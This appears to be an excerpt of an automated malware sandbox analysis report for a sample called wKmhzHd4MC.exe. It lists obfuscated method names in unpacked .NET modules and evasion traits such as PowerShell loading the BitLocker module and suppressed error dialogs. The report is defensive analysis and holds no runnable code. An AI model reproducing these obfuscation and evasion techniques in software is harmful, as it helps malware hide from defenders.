Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, nAxrSWFPeQlPQIcJwS.cs	High entropy of concatenated method names: 'jQhpmVqij1', 'bwhpYvNlwS', 'NUOps5lUTF', 'ikkpaTvJ0C', 'sv8pOwhLR1', 'KTBsydRSjr', 'IFVswXVlgY', 'JGEsDXbfde', 'sjAsC0Ce5B', 'hVTs99Za07'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, EhFZwRzPhWr0VPHNoQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IeTl7CMMBg', 'we7l6gmmfh', 'Pabl8Vx5gQ', 'QDKl0KgdUX', 'O9wlESaJQm', 'wXcllhQJPK', 'MFIlAdi3Yl'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, laO6TvjajP41GnsO82.cs	High entropy of concatenated method names: 'ywVl4CKmg1', 'uihlei5FOk', 'ekAlSZG5mX', 'e14lk5pxrR', 'wt4lYtKwKi', 'vymlsBsKyo', 'Iyslp4piTp', 'UddED9vG2F', 'cZOEC0iE6r', 'ciSE9bpUky'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, y9FLRjKotnLtLmQi9d.cs	High entropy of concatenated method names: 'nxrQHogIr', 'Wq6ULp9Wp', 'HtVgW3O7A', 'gnWJjOhc0', 'Kcpc4LcX6', 'hi3Tkcta2', 'Y1JIaU0vouGu8ORdvX', 'xXQM76H2e9QpUFgKv3', 'KWaE7QtQF', 'SaCAsl5u5'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, t6WtQkfbttjcOeMYRj.cs	High entropy of concatenated method names: 'j9s6HlKlsm', 'zkM6bHcR1u', 'xu66f2m8ro', 'grc6Nqbacv', 'x9261n5H6B', 'yhL6qJlCv9', 'ASJ63FqvHQ', 'eTD6MYR6kD', 'WtL65965sq', 'bVh6IqOvbp'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, QnWS1PZql0uxAoieUc.cs	High entropy of concatenated method names: 'kI7Yf4y6lK', 'YNYYNeVPyE', 'oPyYtx4JRm', 'KZ5Yi52aQD', 'BfAYy6axN8', 'GFlYwMI2Kg', 'TgTYDdT14t', 'eWsYClcF8h', 'QS2Y9KCXFK', 'UYgYjnHUx0'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, etxF1aGY3i72Ni5E27.cs	High entropy of concatenated method names: 'G6eaneTfRv', 'alQaLfNTO8', 'ODuaQR7Veg', 'ymgaUsEBNa', 'TwGauQfng0', 'gsEagUZ2Bs', 'uLqaJ0jh2x', 'nCDaZtPsfe', 'jobac3SsSb', 'J3UaTwXsdI'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, gT2bCbIb12Y5ZSqTbb.cs	High entropy of concatenated method names: 'z8SakpMtAA', 'WmRaPQaP0k', 'W6CappG3x3', 'xkUpjLq03A', 'lXLpzfvm3U', 'K9HaWC0JLw', 's5Ma4BGr6a', 'ylpaKV0TTk', 'Sf3aewEc2N', 'ti9aS930iD'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, MZnQ3xwu21GpursKNb.cs	High entropy of concatenated method names: 'DIX0C767B9', 'FTm0jU7KtL', 'GTHEWPeHcF', 'fivE4pZvcP', 'LYK0xSDfLv', 'gJl0bY75q9', 'dMl02pXZaM', 'LyS0fW3xh7', 'qdj0N9QNrV', 'we30trD5Qr'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, EifTAZOoEMixPruKRG.cs	High entropy of concatenated method names: 'Q3uemVkwww', 'dEDeknA3eQ', 'EYLeYUl99q', 'cuHePxBxXQ', 'VR4esmqqOw', 'mdbepCYoAK', 'MRqea5RjSx', 'faHeOHCGVY', 'Bd9eBT87on', 'm1jehVi8Hc'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, UyaPdTY0fLBU7X2knf.cs	High entropy of concatenated method names: 'Dispose', 'yGv49DwPVp', 'oCMK1ep9A7', 'TMRKKYnIUw', 'y1u4jZEg8I', 'Bnp4zSQZOX', 'ProcessDialogKey', 'amWKWQrOrb', 'xrPK4BrfEi', 'Co5KKhaO6T'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, d3q3DI4WBRE4KqKHrra.cs	High entropy of concatenated method names: 'Qd7lnWVOhX', 'Td9lLGurkQ', 'mITlQu18YE', 'UwylUEPEIB', 'AZYlufmMrx', 'FdNlg7Pxtu', 'XynlJ9p5jP', 'O3NlZOJ9UD', 'dDtlctDIFM', 'WZjlT608v0'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, HuZEg8CIunpSQZOXWm.cs	High entropy of concatenated method names: 'fCuEk0T4Oq', 'A3wEYr4H2P', 'YqdEPHmdfP', 'BY4EsKh9Gj', 'WMHEpXdyWh', 'lD5EapsTQt', 'C4JEO8ANj2', 'KbREBBHngB', 'MkuEhWQwPV', 'lbvEvhsZ5K'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, Ge7cAlcHWSRNOnvURV.cs	High entropy of concatenated method names: 'XT6PUgy7lD', 'VNKPguomC4', 'Ex6PZWWCQ9', 'z2LPcI5v7k', 'KAYP6yHLge', 'DdKP8wiqk7', 'qN8P04rABL', 'd6IPELBTMH', 'IjaPl6JlcJ', 'GObPAcrGuq'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, zkpE042KbgtuSQVAOW.cs	High entropy of concatenated method names: 'ilI7ZjCHWi', 'kgI7c0ZWp5', 'DNY7F3aEwN', 'dwS7166sg8', 'Axy73rviUX', 'AIJ7Mhfydw', 'FbR7I4CvMy', 'q4j7dlLETU', 'q8b7HUc0if', 'rRy7xCognq'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, fU5bVwPCnGJi4L9j7I.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Lq0K9Mbm4Z', 'mI6KjsQUOa', 'WI4KzPft3e', 'CgjeWTxHf7', 'UDse42V9jx', 'aHAeKdZ7gu', 'eC9ee4xpdh', 'hqeFsmmV7DJA84Ga1J4'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, bgBSj8TFYatyCTE6uy.cs	High entropy of concatenated method names: 'SiisuVk3lR', 'AVWsJcnEK4', 'l5dPqEwSjZ', 'HkMP3dlnMY', 'qNFPMyhT4n', 'LDCP5d0dxQ', 'VkbPICUROE', 'BXKPdAB0Bp', 'v6HPG4LMfG', 'wGPPHU7xcK'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, aHyo3k1jVwyEGZwv1C.cs	High entropy of concatenated method names: 'pTFZdy4tdtuwDFV0ghm', 'tP3F8J4rcCUej5f1kus', 'wkbpEBDGDo', 'YJjpli53X5', 'Wj7pAy3MMn', 'KsDNZ04MXY4PbR0cLeu', 'z06HcK4y5BwJoVvgVPR'
Source: 0.2.wKmhzHd4MC.exe.2d19fec.3.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.wKmhzHd4MC.exe.2d19fec.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.wKmhzHd4MC.exe.2d042cc.2.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.wKmhzHd4MC.exe.2d042cc.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.wKmhzHd4MC.exe.2cc6cfc.1.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.wKmhzHd4MC.exe.2cc6cfc.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, VT1QWiS9wPgy5kukcA.cs	High entropy of concatenated method names: 'jP24anWS1P', 'Hl04OuxAoi', 'sHW4hSRNOn', 'mUR4vV4gBS', 'FE646uyvAx', 'vSW48PeQlP', 'SR5ZAg5Hig3LmNlQFR', 'SI8NK8iREslUX6qA6L', 'NxYoF5X61EhOnGHK0q', 'tA844OwPJJ'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, aQrOrb9nrPBrfEigo5.cs	High entropy of concatenated method names: 'LVfEFP4RUT', 'jQnE1kCeUM', 'fyZEq88SA5', 'mtfE3RIpek', 'KEMEf8brbx', 'wSIEM0Plo8', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, J9NrSd4eMoIiCI2mE42.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hj6AfK4xcS', 'Q4gAN4CejW', 'rtyAtSXT9R', 'KNqAiwUd9c', 'XaNAy6aWsu', 'BxtAwDQEgH', 'twYAD0ByBS'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, x0AH4Etar2Z6317Eoj.cs	High entropy of concatenated method names: 'ToString', 'H928xslqrh', 'D2y81w788c', 'oQS8qs5Esb', 'wqX83JvL1V', 'dEp8MvvRVk', 'xnr85Ws62l', 'xhj8IopGMi', 'vlX8dAl0jK', 'kyE8GtpMoF'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, nAxrSWFPeQlPQIcJwS.cs	High entropy of concatenated method names: 'jQhpmVqij1', 'bwhpYvNlwS', 'NUOps5lUTF', 'ikkpaTvJ0C', 'sv8pOwhLR1', 'KTBsydRSjr', 'IFVswXVlgY', 'JGEsDXbfde', 'sjAsC0Ce5B', 'hVTs99Za07'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, EhFZwRzPhWr0VPHNoQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IeTl7CMMBg', 'we7l6gmmfh', 'Pabl8Vx5gQ', 'QDKl0KgdUX', 'O9wlESaJQm', 'wXcllhQJPK', 'MFIlAdi3Yl'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, laO6TvjajP41GnsO82.cs	High entropy of concatenated method names: 'ywVl4CKmg1', 'uihlei5FOk', 'ekAlSZG5mX', 'e14lk5pxrR', 'wt4lYtKwKi', 'vymlsBsKyo', 'Iyslp4piTp', 'UddED9vG2F', 'cZOEC0iE6r', 'ciSE9bpUky'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, y9FLRjKotnLtLmQi9d.cs	High entropy of concatenated method names: 'nxrQHogIr', 'Wq6ULp9Wp', 'HtVgW3O7A', 'gnWJjOhc0', 'Kcpc4LcX6', 'hi3Tkcta2', 'Y1JIaU0vouGu8ORdvX', 'xXQM76H2e9QpUFgKv3', 'KWaE7QtQF', 'SaCAsl5u5'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, t6WtQkfbttjcOeMYRj.cs	High entropy of concatenated method names: 'j9s6HlKlsm', 'zkM6bHcR1u', 'xu66f2m8ro', 'grc6Nqbacv', 'x9261n5H6B', 'yhL6qJlCv9', 'ASJ63FqvHQ', 'eTD6MYR6kD', 'WtL65965sq', 'bVh6IqOvbp'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, QnWS1PZql0uxAoieUc.cs	High entropy of concatenated method names: 'kI7Yf4y6lK', 'YNYYNeVPyE', 'oPyYtx4JRm', 'KZ5Yi52aQD', 'BfAYy6axN8', 'GFlYwMI2Kg', 'TgTYDdT14t', 'eWsYClcF8h', 'QS2Y9KCXFK', 'UYgYjnHUx0'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, etxF1aGY3i72Ni5E27.cs	High entropy of concatenated method names: 'G6eaneTfRv', 'alQaLfNTO8', 'ODuaQR7Veg', 'ymgaUsEBNa', 'TwGauQfng0', 'gsEagUZ2Bs', 'uLqaJ0jh2x', 'nCDaZtPsfe', 'jobac3SsSb', 'J3UaTwXsdI'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, gT2bCbIb12Y5ZSqTbb.cs	High entropy of concatenated method names: 'z8SakpMtAA', 'WmRaPQaP0k', 'W6CappG3x3', 'xkUpjLq03A', 'lXLpzfvm3U', 'K9HaWC0JLw', 's5Ma4BGr6a', 'ylpaKV0TTk', 'Sf3aewEc2N', 'ti9aS930iD'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, MZnQ3xwu21GpursKNb.cs	High entropy of concatenated method names: 'DIX0C767B9', 'FTm0jU7KtL', 'GTHEWPeHcF', 'fivE4pZvcP', 'LYK0xSDfLv', 'gJl0bY75q9', 'dMl02pXZaM', 'LyS0fW3xh7', 'qdj0N9QNrV', 'we30trD5Qr'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, EifTAZOoEMixPruKRG.cs	High entropy of concatenated method names: 'Q3uemVkwww', 'dEDeknA3eQ', 'EYLeYUl99q', 'cuHePxBxXQ', 'VR4esmqqOw', 'mdbepCYoAK', 'MRqea5RjSx', 'faHeOHCGVY', 'Bd9eBT87on', 'm1jehVi8Hc'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, UyaPdTY0fLBU7X2knf.cs	High entropy of concatenated method names: 'Dispose', 'yGv49DwPVp', 'oCMK1ep9A7', 'TMRKKYnIUw', 'y1u4jZEg8I', 'Bnp4zSQZOX', 'ProcessDialogKey', 'amWKWQrOrb', 'xrPK4BrfEi', 'Co5KKhaO6T'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, d3q3DI4WBRE4KqKHrra.cs	High entropy of concatenated method names: 'Qd7lnWVOhX', 'Td9lLGurkQ', 'mITlQu18YE', 'UwylUEPEIB', 'AZYlufmMrx', 'FdNlg7Pxtu', 'XynlJ9p5jP', 'O3NlZOJ9UD', 'dDtlctDIFM', 'WZjlT608v0'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, HuZEg8CIunpSQZOXWm.cs	High entropy of concatenated method names: 'fCuEk0T4Oq', 'A3wEYr4H2P', 'YqdEPHmdfP', 'BY4EsKh9Gj', 'WMHEpXdyWh', 'lD5EapsTQt', 'C4JEO8ANj2', 'KbREBBHngB', 'MkuEhWQwPV', 'lbvEvhsZ5K'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, Ge7cAlcHWSRNOnvURV.cs	High entropy of concatenated method names: 'XT6PUgy7lD', 'VNKPguomC4', 'Ex6PZWWCQ9', 'z2LPcI5v7k', 'KAYP6yHLge', 'DdKP8wiqk7', 'qN8P04rABL', 'd6IPELBTMH', 'IjaPl6JlcJ', 'GObPAcrGuq'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, zkpE042KbgtuSQVAOW.cs	High entropy of concatenated method names: 'ilI7ZjCHWi', 'kgI7c0ZWp5', 'DNY7F3aEwN', 'dwS7166sg8', 'Axy73rviUX', 'AIJ7Mhfydw', 'FbR7I4CvMy', 'q4j7dlLETU', 'q8b7HUc0if', 'rRy7xCognq'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, fU5bVwPCnGJi4L9j7I.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Lq0K9Mbm4Z', 'mI6KjsQUOa', 'WI4KzPft3e', 'CgjeWTxHf7', 'UDse42V9jx', 'aHAeKdZ7gu', 'eC9ee4xpdh', 'hqeFsmmV7DJA84Ga1J4'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, bgBSj8TFYatyCTE6uy.cs	High entropy of concatenated method names: 'SiisuVk3lR', 'AVWsJcnEK4', 'l5dPqEwSjZ', 'HkMP3dlnMY', 'qNFPMyhT4n', 'LDCP5d0dxQ', 'VkbPICUROE', 'BXKPdAB0Bp', 'v6HPG4LMfG', 'wGPPHU7xcK'
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, aHyo3k1jVwyEGZwv1C.cs	High entropy of concatenated method names: 'pTFZdy4tdtuwDFV0ghm', 'tP3F8J4rcCUej5f1kus', 'wkbpEBDGDo', 'YJjpli53X5', 'Wj7pAy3MMn', 'KsDNZ04MXY4PbR0cLeu', 'z06HcK4y5BwJoVvgVPR'
Source: 0.2.wKmhzHd4MC.exe.7330000.7.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.wKmhzHd4MC.exe.7330000.7.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
